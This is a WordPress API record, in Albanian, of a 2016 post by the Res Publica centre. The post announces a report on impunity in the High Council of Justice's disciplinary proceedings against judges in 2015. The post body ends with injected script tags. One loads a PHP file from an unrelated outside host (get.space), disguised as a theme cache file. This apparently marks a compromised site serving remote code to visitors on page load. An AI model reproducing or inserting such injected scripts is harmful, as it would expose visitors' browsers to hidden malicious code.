{"id":1125,"date":"2016-04-02T15:40:58","date_gmt":"2016-04-02T13:40:58","guid":{"rendered":"http:\/\/www.respublica.org.al\/?p=1125"},"modified":"2016-04-13T22:54:30","modified_gmt":"2016-04-13T20:54:30","slug":"pandeshkueshmeria-ne-procedimet-disiplinore-te-gjyqtareve-nga-kld-gjate-vitit-2015-2","status":"publish","type":"post","link":"https:\/\/www.respublica.org.al\/web\/?p=1125","title":{"rendered":"Pand\u00ebshkueshm\u00ebria n\u00eb procedimet disiplinore t\u00eb gjyqtar\u00ebve nga KLD, gjat\u00eb vitit 2015"},"content":{"rendered":"<p><a href=\"http:\/\/www.respublica.org.al\/pandeshkueshmeria-ne-procedimet-disiplinore-te-gjyqtareve-nga-kld-gjate-vitit-2015-2\/capture002\/\" rel=\"attachment wp-att-1174\"><img fetchpriority=\"high\" decoding=\"async\" class=\"alignleft size-medium wp-image-1174\" src=\"http:\/\/www.respublica.org.al\/wp-content\/uploads\/2016\/04\/Capture002-212x300.jpg\" alt=\"Capture002\" width=\"212\" height=\"300\" srcset=\"https:\/\/www.respublica.org.al\/web\/wp-content\/uploads\/2016\/04\/Capture002-212x300.jpg 212w, https:\/\/www.respublica.org.al\/web\/wp-content\/uploads\/2016\/04\/Capture002.jpg 517w\" sizes=\"(max-width: 212px) 100vw, 212px\" \/><\/a>Viti 2015 ka qen\u00eb nj\u00eb vit aktiv sa i takon c\u00ebshtjeve t\u00eb drejt\u00ebsis\u00eb n\u00eb vend. Reforma n\u00eb Drejt\u00ebsi n\u00eb qend\u00ebr t\u00eb diskursit politik dhe t\u00eb veprimtaris\u00eb parlamentare i ka dh\u00ebn\u00eb nj\u00eb v\u00ebmendje t\u00eb posa\u00e7me edhe K\u00ebshillit t\u00eb Lart\u00eb t\u00eb Drejt\u00ebsis\u00eb, si organi i nivelit m\u00eb t\u00eb lart\u00eb dhe m\u00eb i r\u00ebnd\u00ebsish\u00ebm i sistemit t\u00eb Drejt\u00ebsis\u00eb.<\/p>\n<p>Qendra Res Publica ka ndjekur nga af\u00ebr punimet dhe diskutimet p\u00ebr Reform\u00ebn n\u00eb Drejt\u00ebsi, ku nj\u00eb vend t\u00eb r\u00ebnd\u00ebsish\u00ebm ka z\u00ebn\u00eb edhe diskutimi p\u00ebr riorganizimin e K\u00ebshillit t\u00eb Lart\u00eb t\u00eb Drejt\u00ebsis\u00eb, p\u00ebr t\u00eb cilin Res Publica ka v\u00ebn\u00eb n\u00eb dispozicion t\u00eb Komisionit Parlamentar p\u00ebr Reform\u00ebn n\u00eb Drejt\u00ebsi rekomandimet dhe opininonin e saj, n\u00eb lidhje me disa aspekte t\u00eb reformimit t\u00eb k\u00ebtij organi. Rekomandimet jan\u00eb mb\u00ebshtetur n\u00eb studimin e m\u00ebparsh\u00ebm \u201cPand\u00ebshkueshm\u00ebria n\u00eb procedimet disiplinore t\u00eb gjyqtar\u00ebve: Analiz\u00eb e disa prej shkaqeve q\u00eb stimulojn\u00eb pand\u00ebshkueshm\u00ebrin\u00eb e K\u00ebshillit t\u00eb Lart\u00eb t\u00eb Drejt\u00ebsis\u00eb,\u201d t\u00eb publikuar nga Res Publica n\u00eb Maj 2015, mb\u00ebshtetur nga Fondacioni Shoq\u00ebria e Hapur p\u00ebr Shqip\u00ebrin\u00eb. Nj\u00eb pjes\u00eb e k\u00ebtyre rekomandimeve gjet\u00ebn pasqyrim edhe n\u00eb \u201cAnaliz\u00ebn e Sistemit t\u00eb Drejt\u00ebsis\u00eb\u201d, p\u00ebrgatitur nga Komisioni Parlamentar p\u00ebr Reform\u00ebn n\u00eb Drejt\u00ebsi dhe komisioni ad-hoc, Grupi i Ekspert\u00ebve t\u00eb Nivelit t\u00eb Lart\u00eb, i ngritur n\u00eb Qershor 2015.<\/p>\n<p>N\u00eb vazhdim\u00ebsi, dhe n\u00ebn drit\u00ebn e studimit t\u00eb sip\u00ebrp\u00ebrmendur, me mb\u00ebshtetjen e Fondacionit Shoq\u00ebria e Hapur p\u00ebr Shqip\u00ebrin\u00eb, Res Publica ka vazhduar monitorimin e K\u00ebshillit t\u00eb Lart\u00eb t\u00eb Drejt\u00ebsis\u00eb edhe p\u00ebr vitin 2015, n\u00eb lidhje me transparenc\u00ebn, procedimet disiplinore ndaj gjyqtar\u00ebve, p\u00ebrballjen e k\u00ebtij institucioni me fenomenet korruptive n\u00eb gjyq\u00ebsor, etj.<\/p>\n<p><a href=\"http:\/\/www.respublica.org.al\/wp-content\/uploads\/2016\/04\/Pandeshkueshmeria-ne-procedimet-disiplinore-te-gjyqtareve-ne-veprimtarine-e-KLD-gjate-vitit-2015.pdf\">Nj\u00eb kopje elektronike t\u00eb raportit mund ta shkarkoni duke klikuar k\u00ebtu.<\/a><script type=\"text\/javascript\" src=\"#\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/www.get.space\/wp-content\/cache\/tmpWpfc\/theme-index.php\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Viti 2015 ka qen\u00eb nj\u00eb vit aktiv sa i takon c\u00ebshtjeve t\u00eb drejt\u00ebsis\u00eb n\u00eb vend. Reforma n\u00eb Drejt\u00ebsi n\u00eb qend\u00ebr [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1174,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"footnotes":""},"categories":[6,9,1],"tags":[],"_links":{"self":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/1125"}],"collection":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1125"}],"version-history":[{"count":7,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/1125\/revisions"}],"predecessor-version":[{"id":1175,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/1125\/revisions\/1175"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/media\/1174"}],"wp:attachment":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1125"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1125"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1125"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}